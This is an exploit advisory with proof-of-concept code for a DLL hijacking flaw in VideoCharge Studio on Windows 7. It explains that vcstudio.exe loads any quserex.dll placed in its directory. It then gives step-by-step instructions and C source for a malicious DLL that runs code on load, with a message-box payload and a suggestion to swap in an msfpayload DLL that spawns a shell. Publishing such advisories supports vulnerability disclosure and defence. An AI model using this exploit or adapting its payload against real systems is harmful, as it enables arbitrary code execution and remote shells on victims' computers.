# Exploit Title: VideoCharge Studio DLL Hijacking Exploit (quserex.dll )
# Date: 13-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://www.videocharge.com/
# Software Link:
http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Tested on:Windows 7
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: quserex.dll

vcstudio.exe will search for an load any DLL named "quserex.dll".
If an attacker can place the DLL in a location
where victim open vcstudio.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.

#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:

1- Save and compile below C code as 'quserex.dll' to create vuln DLL

2- Place 'quserex.dll' on Same Directory of vcstudio.exe

3- Open vcstudio.exe

//gcc test.c -o quserex.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################################
Discovered By : Amir.ght #######
#################################